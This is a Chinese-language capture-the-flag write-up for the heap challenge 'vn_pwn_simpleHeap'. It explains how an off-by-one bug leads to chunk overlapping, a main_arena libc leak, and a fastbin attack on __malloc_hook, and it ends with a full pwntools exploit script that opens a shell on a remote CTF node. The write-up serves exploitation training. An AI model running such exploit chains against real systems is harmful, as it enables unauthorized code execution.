又是一个堆题
sub_AB2 是到heap_got (储存堆指针的表)里面找第一个空着的堆序号返回给v1,没有可用的就返回-1,最多申请10个堆
之后输入堆的大小,最大是 111,也就是0x6F,,加上chunk头是0x7F ,也就是申请的堆只能fastbin大小
之后是填写 heap_got ,并且写入堆,没有溢出 (但是申请不是0x10整数倍而是多出8字节,比如 0x18 0x28,多出的8字节会在下一个chunk的presize里使用,,这是presize的复用,堆的一个机制,后面会说到,利用这个机制还有 off by one 覆盖size位)
edit函数可以看到get_input_content函数包含一个off_by_one漏洞。
两个函数没有什么错误,指针还置零了
利用off-by-one漏洞,篡改chunk的size大小,使被篡改大小的chunk覆盖其后已申请的chunk大小,从而导致chunk overlapping
思路
使被篡改的chunk的size超过fastbin大小,64位linux下是0x80,使其free之后落入unsortedbins,当unsorted bins中只有一个kongxianchunk时,其fd去bk指针均指向main_arena+88,从而泄露arena地址,进一步泄露libc机制
获得libc基址之后,伪造fake_chunk,使其指向malloc_hook附近,并利用fastbin attack获得fake chunk,从而改写malloc hook为one_gadget,使得下一次申请堆时执行one_gadget
1.申请chunks,利用off-by-one,改写chunk1大小
2. 利用Edit功能里存在的off-by-one漏洞,改写chunk1的size,使其包含chunk1与chunk2,即chunk1 chunk overlapping chunk2,并释放chunk1,这时其大小为0xe0(0x70+0x70),落入unsorted bins
3. 申请chunk1未修改之前大小的chunk(0x60),使得unsorted bins切片,这时chunk1指向新申请到的0x70大小的chunk,而chunk2 仍然在unsorted bin中(但是实际上它之前就已经被用户申请了,所以直接利用show功能显示chunk2里的内容,即泄露main_aren
4. 利用vmmap,查看加载libc的基址,如图,可以看到libc基址为0x7ffff7a0d000(注意,这里是libc-2.23.so,而不是/lib/x86_64-linux-gnu/ld-2.23.so,后者是本机libc,前者为我们主动加载的libc),步骤3获知main arena地址为0x7ffff7dd1b78-88=0x7ffff7dd1b20,则偏移量为0x7ffff7dd1b78-0x7ffff7a0d000=0x3c4b20
from pwn import *
#io = process(['./vn_pwn_simpleHeap'],env={"LD_PRELOAD":"./libc-2.23.so"})
io=remote("node3.buuoj.cn",28058)
elf=ELF('./vn_pwn_simpleHeap')
libc=ELF('./libc-2.23.so')
context(os='linux',arch=elf.arch,log_level='debug')
def Add(size,content):
io.recvuntil("choice: ")
io.sendline("1")
io.sendlineafter("size?",str(size))
io.sendlineafter("content:",content)
def Edit(idx,content):
io.recvuntil("choice: ")
io.sendline("2")
io.sendlineafter("idx?",str(idx))
io.sendlineafter("content:",content)
def Show(idx):
io.recvuntil("choice: ")
io.sendline("3")
io.sendlineafter("idx?",str(idx))
def Delete(idx):
io.recvuntil("choice: ")
io.sendline("4")
io.sendlineafter("idx?",str(idx))
def Exit():
io.sendlineafter("choice: ", "5")
Add(0x18,"AAAA")#0
Add(0x60,"AAAA")#1
Add(0x60,"AAAA")#2
Add(0x10,"AAAA")#3
Edit(0,"A"*0x18+"\xe1")
Delete(1)
Add(0x60,"BBBB")#1
Show(2)
main_arena=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x58
log.success("main arena address : "+hex(main_arena))
libc_base=main_arena-0x3C4B20
malloc_hook=main_arena-0x10
fake_chunk=malloc_hook-0x23
realloc_hook=libc_base+libc.symbols['__libc_realloc']
one_gadget_offset=[0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget=libc_base+one_gadget_offset[1]
Add(0x60,"tmp")#4
Delete(4)
Edit(2,p64(fake_chunk))
Add(0x60,"tmp")
payload="c"*(0x13-0x8)+p64(one_gadget)+p64(realloc_hook+13)
Add(0x60,payload)#5
io.recvuntil("choice: ")
io.sendline("1")
io.sendlineafter("size?", "1")
io.interactive()
灵感借鉴与这